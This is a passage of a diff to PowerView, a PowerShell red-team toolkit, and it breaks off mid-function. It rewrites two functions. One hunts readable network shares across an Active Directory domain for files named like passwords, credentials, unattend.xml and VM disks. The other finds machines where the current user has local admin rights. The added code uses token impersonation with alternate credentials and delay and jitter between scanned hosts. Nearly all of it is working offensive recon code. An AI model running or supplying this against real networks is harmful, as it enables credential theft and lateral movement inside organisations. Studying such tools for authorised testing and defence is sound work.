+Switch. Find .EXEs accessed within the last 7 days.
- Delay between enumerating hosts, defaults to 0
+.PARAMETER Server
- .PARAMETER Jitter
+Specifies an Active Directory server (domain controller) to bind to.
- Jitter for the host delay, defaults to +/- 0.3
+.PARAMETER SearchScope
- .PARAMETER Domain
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
- Domain to query for machines, defaults to the current domain.
+.PARAMETER ResultPageSize
- .PARAMETER DomainController
+Specifies the PageSize to set for the LDAP searcher object.
- Domain controller to reflect LDAP queries through.
+.PARAMETER ServerTimeLimit
- .PARAMETER SearchForest
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- Search all domains in the forest for target users instead of just
- a single domain.
+.PARAMETER Tombstone
- .PARAMETER SearchSYSVOL
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- Switch. Search for login scripts on the SYSVOL of the primary DCs for each specified domain.
+.PARAMETER Credential
- .PARAMETER Threads
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain and target systems.
- The maximum concurrent threads to execute.
+.PARAMETER Delay
- .PARAMETER UsePSDrive
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
- Switch. Mount target remote path with temporary PSDrives.
+.PARAMETER Jitter
- .EXAMPLE
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
- PS C:\> Invoke-FileFinder
+.PARAMETER Threads
- Find readable files on the domain with 'pass', 'sensitive',
- 'secret', 'admin', 'login', or 'unattend*.xml' in the name,
+The number of threads to use for user searching, defaults to 20.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Invoke-FileFinder -Domain testing
+Find-InterestingDomainShareFile
- Find readable files on the 'testing' domain with 'pass', 'sensitive',
- 'secret', 'admin', 'login', or 'unattend*.xml' in the name,
+Finds 'interesting' files on the current domain.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Invoke-FileFinder -IncludeC
+Find-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local')
- Find readable files on the domain with 'pass', 'sensitive',
- 'secret', 'admin', 'login' or 'unattend*.xml' in the name,
- including C$ shares.
+Finds 'interesting' files on readable shares on the specified systems.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Invoke-FileFinder -ShareList shares.txt -Terms accounts,ssn -OutFile out.csv
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('DEV\dfm.a', $SecPassword)
+Find-DomainShare -Domain testlab.local -Credential $Cred
- Enumerate a specified share list for files with 'accounts' or
- 'ssn' in the name, and write everything to "out.csv"
+Searches interesting files in the testlab.local domain using the specified alternate credentials.
- .LINK
- http://www.harmj0y.net/blog/redteaming/file-server-triage-on-red-team-engagements/
+.OUTPUTS
+PowerView.FoundFile
#>
- [CmdletBinding()]
- param(
- [Parameter(Position=0,ValueFromPipeline=$True)]
- [Alias('Hosts')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.FoundFile')]
+ [CmdletBinding(DefaultParameterSetName = 'FileSpecification')]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DNSHostName')]
[String[]]
$ComputerName,
- [ValidateScript({Test-Path -Path $_ })]
- [Alias('HostList')]
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerFile,
+ $ComputerDomain,
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerFilter,
+ $ComputerLDAPFilter,
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerADSpath,
+ $ComputerSearchBase,
- [ValidateScript({Test-Path -Path $_ })]
+ [ValidateNotNullOrEmpty()]
+ [Alias('OperatingSystem')]
[String]
- $ShareList,
+ $ComputerOperatingSystem,
- [Switch]
- $OfficeDocs,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ServicePack')]
+ [String]
+ $ComputerServicePack,
- [Switch]
- $FreshEXEs,
+ [ValidateNotNullOrEmpty()]
+ [Alias('SiteName')]
+ [String]
+ $ComputerSiteName,
- [Alias('Terms')]
+ [Parameter(ParameterSetName = 'FileSpecification')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('SearchTerms', 'Terms')]
[String[]]
- $SearchTerms,
+ $Include = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'),
- [ValidateScript({Test-Path -Path $_ })]
- [String]
- $TermList,
+ [ValidateNotNullOrEmpty()]
+ [ValidatePattern('\\\\')]
+ [Alias('Share')]
+ [String[]]
+ $SharePath,
- [String]
+ [String[]]
+ $ExcludedShares = @('C$', 'Admin$', 'Print$', 'IPC$'),
+
+ [Parameter(ParameterSetName = 'FileSpecification')]
+ [ValidateNotNullOrEmpty()]
+ [DateTime]
$LastAccessTime,
- [String]
+ [Parameter(ParameterSetName = 'FileSpecification')]
+ [ValidateNotNullOrEmpty()]
+ [DateTime]
$LastWriteTime,
- [String]
+ [Parameter(ParameterSetName = 'FileSpecification')]
+ [ValidateNotNullOrEmpty()]
+ [DateTime]
$CreationTime,
+ [Parameter(ParameterSetName = 'OfficeDocs')]
[Switch]
- $IncludeC,
+ $OfficeDocs,
+ [Parameter(ParameterSetName = 'FreshEXEs')]
[Switch]
- $IncludeAdmin,
+ $FreshEXEs,
- [Switch]
- $ExcludeFolders,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
- [Switch]
- $ExcludeHidden,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
- [Switch]
- $CheckWriteAccess,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
- [String]
- $OutFile,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
[Switch]
- $NoClobber,
+ $Tombstone,
- [Switch]
- $NoPing,
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
- [UInt32]
+ [ValidateRange(1, 10000)]
+ [Int]
$Delay = 0,
+ [ValidateRange(0.0, 1.0)]
[Double]
$Jitter = .3,
- [String]
- $Domain,
-
- [String]
- $DomainController,
-
- [Switch]
- $SearchForest,
-
- [Switch]
- $SearchSYSVOL,
-
- [ValidateRange(1,100)]
[Int]
- $Threads,
-
- [Switch]
- $UsePSDrive
+ [ValidateRange(1, 100)]
+ $Threads = 20
)
- begin {
- if ($PSBoundParameters['Debug']) {
- $DebugPreference = 'Continue'
- }
-
- # random object for delay
- $RandNo = New-Object System.Random
-
- Write-Verbose "[*] Running Invoke-FileFinder with delay of $Delay"
-
- $Shares = @()
-
- # figure out the shares we want to ignore
- [String[]] $ExcludedShares = @("C$", "ADMIN$")
-
- # see if we're specifically including any of the normally excluded sets
- if ($IncludeC) {
- if ($IncludeAdmin) {
- $ExcludedShares = @()
- }
- else {
- $ExcludedShares = @("ADMIN$")
- }
+ BEGIN {
+ $ComputerSearcherArguments = @{
+ 'Properties' = 'dnshostname'
+ }
+ if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
+ if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
+ if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+ if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
+ if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
+ if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
+ if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
+
+ if ($PSBoundParameters['ComputerName']) {
+ $TargetComputers = $ComputerName
}
-
- if ($IncludeAdmin) {
- if ($IncludeC) {
- $ExcludedShares = @()
- }
- else {
- $ExcludedShares = @("C$")
- }
+ else {
+ Write-Verbose '[Find-InterestingDomainShareFile] Querying computers in the domain'
+ $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
}
-
- # delete any existing output file if it already exists
- if(!$NoClobber) {
- if ($OutFile -and (Test-Path -Path $OutFile)) { Remove-Item -Path $OutFile }
+ Write-Verbose "[Find-InterestingDomainShareFile] TargetComputers length: $($TargetComputers.Length)"
+ if ($TargetComputers.Length -eq 0) {
+ throw '[Find-InterestingDomainShareFile] No hosts found to enumerate'
}
- # if there's a set of terms specified to search for
- if ($TermList) {
- ForEach ($Term in Get-Content -Path $TermList) {
- if (($Term -ne $Null) -and ($Term.trim() -ne '')) {
- $SearchTerms += $Term
- }
- }
- }
+ # the host enumeration block we're using to enumerate all servers
+ $HostEnumBlock = {
+ Param($ComputerName, $Include, $ExcludedShares, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $TokenHandle)
- # if we're hard-passed a set of shares
- if($ShareList) {
- ForEach ($Item in Get-Content -Path $ShareList) {
- if (($Item -ne $Null) -and ($Item.trim() -ne '')) {
- # exclude any "[tab]- commants", i.e. the output from Invoke-ShareFinder
- $Share = $Item.Split("`t")[0]
- $Shares += $Share
- }
- }
- }
- else {
- # if we're using a host file list, read the targets in and add them to the target list
- if($ComputerFile) {
- $ComputerName = Get-Content -Path $ComputerFile
+ if ($TokenHandle) {
+ # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation
+ $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet
}
- if(!$ComputerName) {
+ ForEach ($TargetComputer in $ComputerName) {
- if($Domain) {
- $TargetDomains = @($Domain)
- }
- elseif($SearchForest) {
- # get ALL the domains in the forest to search
- $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
+ $SearchShares = @()
+ if ($TargetComputer.StartsWith('\\')) {
+ # if a share is passed as the server
+ $SearchShares += $TargetComputer
}
else {
- # use the local domain
- $TargetDomains = @( (Get-NetDomain).name )
+ $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
+ if ($Up) {
+ # get the shares for this host and display what we find
+ $Shares = Get-NetShare -ComputerName $TargetComputer
+ ForEach ($Share in $Shares) {
+ $ShareName = $Share.Name
+ $Path = '\\'+$TargetComputer+'\'+$ShareName
+ # make sure we get a real share name back
+ if (($ShareName) -and ($ShareName.Trim() -ne '')) {
+ # skip this share if it's in the exclude list
+ if ($ExcludedShares -NotContains $ShareName) {
+ # check if the user has access to this path
+ try {
+ $Null = [IO.Directory]::GetFiles($Path)
+ $SearchShares += $Path
+ }
+ catch {
+ Write-Verbose "[!] No access to $Path"
+ }
+ }
+ }
+ }
+ }
}
- if($SearchSYSVOL) {
- ForEach ($Domain in $TargetDomains) {
- $DCSearchPath = "\\$Domain\SYSVOL\"
- Write-Verbose "[*] Adding share search path $DCSearchPath"
- $Shares += $DCSearchPath
+ ForEach ($Share in $SearchShares) {
+ Write-Verbose "Searching share: $Share"
+ $SearchArgs = @{
+ 'Path' = $Share
+ 'Include' = $Include
}
- if(!$SearchTerms) {
- # search for interesting scripts on SYSVOL
- $SearchTerms = @('.vbs', '.bat', '.ps1')
+ if ($OfficeDocs) {
+ $SearchArgs['OfficeDocs'] = $OfficeDocs
}
- }
- else {
- [array]$ComputerName = @()
-
- ForEach ($Domain in $TargetDomains) {
- Write-Verbose "[*] Querying domain $Domain for hosts"
- $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController
+ if ($FreshEXEs) {
+ $SearchArgs['FreshEXEs'] = $FreshEXEs
}
-
- # remove any null target hosts, uniquify the list and shuffle it
- $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
- if($($ComputerName.Count) -eq 0) {
- throw "No hosts found!"
+ if ($LastAccessTime) {
+ $SearchArgs['LastAccessTime'] = $LastAccessTime
+ }
+ if ($LastWriteTime) {
+ $SearchArgs['LastWriteTime'] = $LastWriteTime
+ }
+ if ($CreationTime) {
+ $SearchArgs['CreationTime'] = $CreationTime
+ }
+ if ($CheckWriteAccess) {
+ $SearchArgs['CheckWriteAccess'] = $CheckWriteAccess
}
+ Find-InterestingFile @SearchArgs
}
}
- }
-
- # script block that enumerates shares and files on a server
- $HostEnumBlock = {
- param($ComputerName, $Ping, $ExcludedShares, $SearchTerms, $ExcludeFolders, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $OutFile, $UsePSDrive)
- Write-Verbose "ComputerName: $ComputerName"
- Write-Verbose "ExcludedShares: $ExcludedShares"
- $SearchShares = @()
+ if ($TokenHandle) {
+ Invoke-RevertToSelf
+ }
+ }
- if($ComputerName.StartsWith("\\")) {
- # if a share is passed as the server
- $SearchShares += $ComputerName
+ $LogonToken = $Null
+ if ($PSBoundParameters['Credential']) {
+ if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
}
else {
- # if we're enumerating the shares on the target server first
- $Up = $True
- if($Ping) {
- $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName
- }
- if($Up) {
- # get the shares for this host and display what we find
- $Shares = Get-NetShare -ComputerName $ComputerName
- ForEach ($Share in $Shares) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet
+ }
+ }
+ }
- $NetName = $Share.shi1_netname
- $Path = '\\'+$ComputerName+'\'+$NetName
+ PROCESS {
+ # only ignore threading if -Delay is passed
+ if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
- # make sure we get a real share name back
- if (($NetName) -and ($NetName.trim() -ne '')) {
+ Write-Verbose "[Find-InterestingDomainShareFile] Total number of hosts: $($TargetComputers.count)"
+ Write-Verbose "[Find-InterestingDomainShareFile] Delay: $Delay, Jitter: $Jitter"
+ $Counter = 0
+ $RandNo = New-Object System.Random
- # skip this share if it's in the exclude list
- if ($ExcludedShares -NotContains $NetName.ToUpper()) {
- # check if the user has access to this path
- try {
- $Null = [IO.Directory]::GetFiles($Path)
- $SearchShares += $Path
- }
- catch {
- Write-Verbose "[!] No access to $Path"
- }
- }
- }
- }
- }
- }
+ ForEach ($TargetComputer in $TargetComputers) {
+ $Counter = $Counter + 1
- ForEach($Share in $SearchShares) {
- $SearchArgs = @{
- 'Path' = $Share
- 'SearchTerms' = $SearchTerms
- 'OfficeDocs' = $OfficeDocs
- 'FreshEXEs' = $FreshEXEs
- 'LastAccessTime' = $LastAccessTime
- 'LastWriteTime' = $LastWriteTime
- 'CreationTime' = $CreationTime
- 'ExcludeFolders' = $ExcludeFolders
- 'ExcludeHidden' = $ExcludeHidden
- 'CheckWriteAccess' = $CheckWriteAccess
- 'OutFile' = $OutFile
- 'UsePSDrive' = $UsePSDrive
- }
+ # sleep for our semi-randomized interval
+ Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
- Find-InterestingFile @SearchArgs
+ Write-Verbose "[Find-InterestingDomainShareFile] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
+ Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $Include, $ExcludedShares, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $LogonToken
}
}
- }
-
- process {
-
- if($Threads) {
- Write-Verbose "Using threading with threads = $Threads"
+ else {
+ Write-Verbose "[Find-InterestingDomainShareFile] Using threading with threads: $Threads"
- # if we're using threading, kick off the script block with Invoke-ThreadedFunction
+ # if we're using threading, kick off the script block with New-ThreadedFunction
$ScriptParams = @{
- 'Ping' = $(-not $NoPing)
+ 'Include' = $Include
'ExcludedShares' = $ExcludedShares
- 'SearchTerms' = $SearchTerms
- 'ExcludeFolders' = $ExcludeFolders
'OfficeDocs' = $OfficeDocs
'ExcludeHidden' = $ExcludeHidden
'FreshEXEs' = $FreshEXEs
'CheckWriteAccess' = $CheckWriteAccess
- 'OutFile' = $OutFile
- 'UsePSDrive' = $UsePSDrive
+ 'TokenHandle' = $LogonToken
}
- # kick off the threaded script block + arguments
- if($Shares) {
- # pass the shares as the hosts so the threaded function code doesn't have to be hacked up
- Invoke-ThreadedFunction -ComputerName $Shares -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
- }
- else {
- Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
- }
+ # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
+ New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
}
+ }
- else {
- if($Shares){
- $ComputerName = $Shares
- }
- elseif(-not $NoPing -and ($ComputerName.count -gt 1)) {
- # ping all hosts in parallel
- $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}
- $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100
- }
-
- Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"
- $Counter = 0
-
- $ComputerName | Where-Object {$_} | ForEach-Object {
- Write-Verbose "Computer: $_"
- $Counter = $Counter + 1
-
- # sleep for our semi-randomized interval
- Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
-
- Write-Verbose "[*] Enumerating server $_ ($Counter of $($ComputerName.count))"
-
- Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $_, $False, $ExcludedShares, $SearchTerms, $ExcludeFolders, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $OutFile, $UsePSDrive
- }
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
@@ -11614,896 +18371,622 @@ function Invoke-FileFinder {
function Find-LocalAdminAccess {
<#
- .SYNOPSIS
+.SYNOPSIS
- Finds machines on the local domain where the current user has
- local administrator access. Uses multithreading to
- speed up enumeration.
+Finds machines on the local domain where the current user has local administrator access.
- Author: @harmj0y
- License: BSD 3-Clause
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Test-AdminAccess, New-ThreadedFunction
- .DESCRIPTION
+.DESCRIPTION
- This function finds the local domain name for a host using Get-NetDomain,
- queries the domain for all active machines with Get-NetComputer, then for
- each server it checks if the current user has local administrator
- access using Invoke-CheckLocalAdminAccess.
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and for each computer it checks if the current user
+has local administrator access using Test-AdminAccess. If -Credential is passed,
+then Invoke-UserImpersonation is used to impersonate the specified user
+before enumeration, reverting after with Invoke-RevertToSelf.
- Idea stolen from the local_admin_search_enum post module in
- Metasploit written by:
- 'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
- 'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>'
- 'Royce Davis "r3dy" <rdavis[at]accuvant.com>'
+Idea adapted from the local_admin_search_enum post module in Metasploit written by:
+ 'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
+ 'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>'
+ 'Royce Davis "r3dy" <rdavis[at]accuvant.com>'
- .PARAMETER ComputerName
+.PARAMETER ComputerName
- Host array to enumerate, passable on the pipeline.
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
- .PARAMETER ComputerFile
+.PARAMETER ComputerDomain
- File of hostnames/IPs to search.
+Specifies the domain to query for computers, defaults to the current domain.
- .PARAMETER ComputerFilter
+.PARAMETER ComputerLDAPFilter
- Host filter name to query AD for, wildcards accepted.
+Specifies an LDAP query string that is used to search for computer objects.
- .PARAMETER ComputerADSpath
+.PARAMETER ComputerSearchBase
- The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+Specifies the LDAP source to search through for computers,
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
- .PARAMETER NoPing
+.PARAMETER ComputerOperatingSystem
- Switch. Don't ping each host to ensure it's up before enumerating.
+Search computers with a specific operating system, wildcards accepted.
- .PARAMETER Delay
+.PARAMETER ComputerServicePack
- Delay between enumerating hosts, defaults to 0
+Search computers with a specific service pack, wildcards accepted.
- .PARAMETER Jitter
+.PARAMETER ComputerSiteName
- Jitter for the host delay, defaults to +/- 0.3
+Search computers in the specific AD Site name, wildcards accepted.
- .PARAMETER Domain
+.PARAMETER CheckShareAccess
- Domain to query for machines, defaults to the current domain.
-
- .PARAMETER DomainController
+Switch. Only display found shares that the local user has access to.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- Domain controller to reflect LDAP queries through.
+.PARAMETER Tombstone
- .PARAMETER SearchForest
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- Switch. Search all domains in the forest for target users instead of just
- a single domain.
+.PARAMETER Credential
- .PARAMETER Threads
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain and target systems.
- The maximum concurrent threads to execute.
+.PARAMETER Delay
- .EXAMPLE
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
- PS C:\> Find-LocalAdminAccess
+.PARAMETER Jitter
- Find machines on the local domain where the current user has local
- administrator access.
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
- .EXAMPLE
+.PARAMETER Threads
- PS C:\> Find-LocalAdminAccess -Threads 10
+The number of threads to use for user searching, defaults to 20.
- Multi-threaded access hunting, replaces Find-LocalAdminAccessThreaded.
+.EXAMPLE
- .EXAMPLE
+Find-LocalAdminAccess
- PS C:\> Find-LocalAdminAccess -Domain testing
+Finds machines in the current domain the current user has admin access to.
- Find machines on the 'testing' domain where the current user has
- local administrator access.
+.EXAMPLE
- .EXAMPLE
+Find-LocalAdminAccess -Domain dev.testlab.local
- PS C:\> Find-LocalAdminAccess -ComputerFile hosts.txt
+Finds machines in the dev.testlab.local domain the current user has admin access to.
- Find which machines in the host list the current user has local
- administrator access.
+.EXAMPLE
- .LINK
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-LocalAdminAccess -Domain testlab.local -Credential $Cred
- https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb
- http://www.harmj0y.net/blog/penetesting/finding-local-admin-with-the-veil-framework/
+Finds machines in the testlab.local domain that the user with the specified -Credential
+has admin access to.
+
+.OUTPUTS
+
+String
+
+Computer dnshostnames the current user has administrative access to.
#>
- [CmdletBinding()]
- param(
- [Parameter(Position=0,ValueFromPipeline=$True)]
- [Alias('Hosts')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType([String])]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DNSHostName')]
[String[]]
$ComputerName,
- [ValidateScript({Test-Path -Path $_ })]
- [Alias('HostList')]
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerFile,
+ $ComputerDomain,
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerFilter,
+ $ComputerLDAPFilter,
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerADSpath,
-
- [Switch]
- $NoPing,
-
- [UInt32]
- $Delay = 0,
+ $ComputerSearchBase,
- [Double]
- $Jitter = .3,
+ [ValidateNotNullOrEmpty()]
+ [Alias('OperatingSystem')]
+ [String]
+ $ComputerOperatingSystem,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ServicePack')]
[String]
- $Domain,
+ $ComputerServicePack,
+ [ValidateNotNullOrEmpty()]
+ [Alias('SiteName')]
[String]
- $DomainController,
+ $ComputerSiteName,
[Switch]
- $SearchForest,
+ $CheckShareAccess,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
- [ValidateRange(1,100)]
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
[Int]
- $Threads
- )
+ $ResultPageSize = 200,
- begin {
- if ($PSBoundParameters['Debug']) {
- $DebugPreference = 'Continue'
- }
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
- # random object for delay
- $RandNo = New-Object System.Random
+ [Switch]
+ $Tombstone,
- Write-Verbose "[*] Running Find-LocalAdminAccess with delay of $Delay"
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
- # if we're using a host list, read the targets in and add them to the target list
- if($ComputerFile) {
- $ComputerName = Get-Content -Path $ComputerFile
- }
+ [ValidateRange(1, 10000)]
+ [Int]
+ $Delay = 0,
- if(!$ComputerName) {
- [array]$ComputerName = @()
+ [ValidateRange(0.0, 1.0)]
+ [Double]
+ $Jitter = .3,
- if($Domain) {
- $TargetDomains = @($Domain)
- }
- elseif($SearchForest) {
- # get ALL the domains in the forest to search
- $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
- }
- else {
- # use the local domain
- $TargetDomains = @( (Get-NetDomain).name )
- }
+ [Int]
+ [ValidateRange(1, 100)]
+ $Threads = 20
+ )
- ForEach ($Domain in $TargetDomains) {
- Write-Verbose "[*] Querying domain $Domain for hosts"
- $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController
- }
-
- # remove any null target hosts, uniquify the list and shuffle it
- $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
- if($($ComputerName.Count) -eq 0) {
- throw "No hosts found!"
- }
+ BEGIN {
+ $ComputerSearcherArguments = @{
+ 'Properties' = 'dnshostname'
+ }
+ if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
+ if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
+ if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+ if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
+ if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
+ if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
+ if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
+ if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
+
+ if ($PSBoundParameters['ComputerName']) {
+ $TargetComputers = $ComputerName
+ }
+ else {
+ Write-Verbose '[Find-LocalAdminAccess] Querying computers in the domain'
+ $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
+ }
+ Write-Verbose "[Find-LocalAdminAccess] TargetComputers length: $($TargetComputers.Length)"
+ if ($TargetComputers.Length -eq 0) {
+ throw '[Find-LocalAdminAccess] No hosts found to enumerate'
}
- # script block that enumerates a server
+ # the host enumeration block we're using to enumerate all servers
$HostEnumBlock = {
- param($ComputerName, $Ping)
+ Param($ComputerName, $TokenHandle)
- $Up = $True
- if($Ping) {
- $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName
+ if ($TokenHandle) {
+ # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation
+ $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet
}
- if($Up) {
- # check if the current user has local admin access to this server
- $Access = Invoke-CheckLocalAdminAccess -ComputerName $ComputerName
- if ($Access.IsAdmin) {
- $ComputerName
+
+ ForEach ($TargetComputer in $ComputerName) {
+ $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
